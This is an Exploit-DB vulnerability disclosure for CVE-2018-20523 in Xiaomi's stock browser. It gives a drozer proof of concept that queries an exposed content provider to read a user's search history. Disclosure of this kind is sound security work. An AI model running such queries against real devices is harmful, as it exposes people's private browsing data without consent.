Xiaomi browser 10.2.4.g – Browser Search History Disclosure

  • 作者: Vishwaraj Bhattrai
    日期: 2021-08-10
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/50188/
  • # Exploit Title: Xiaomi browser 10.2.4.g - Browser Search History Disclosure
    # Date: 27-Dec-2018
    # Exploit Author: Vishwaraj101
    # Vendor Homepage: https://www.mi.com/us
    # Software Link: https://www.apkmirror.com/apk/xiaomi-inc/mi-browse/mi-browse-10-2-4-release/
    # Version: 10.2.4.g
    # Tested on: Tested in Android Version: 8.1.0
    # CVE : CVE-2018-20523
    
    *summary: *
    Xiaomi Stock Browser 10.2.4.g on Xiaomi Redmi Note 5 Pro devices and other Redmi Android phones were vulnerable to content provider injection using which any 3rd party application can read the user’s browser history.
    
    *Vulnerable component:* com.android.browser.searchhistory
    
    *Poc:*
    
    adb forward tcp:31415 tcp:31415
    
    drozer console connect
    
    drozer > run app.provider.query
    content://com.android.browser.searchhistory/searchhistory
    
    *Blogpost:*
    
    
    Content provider injection in Xiaomi stock browser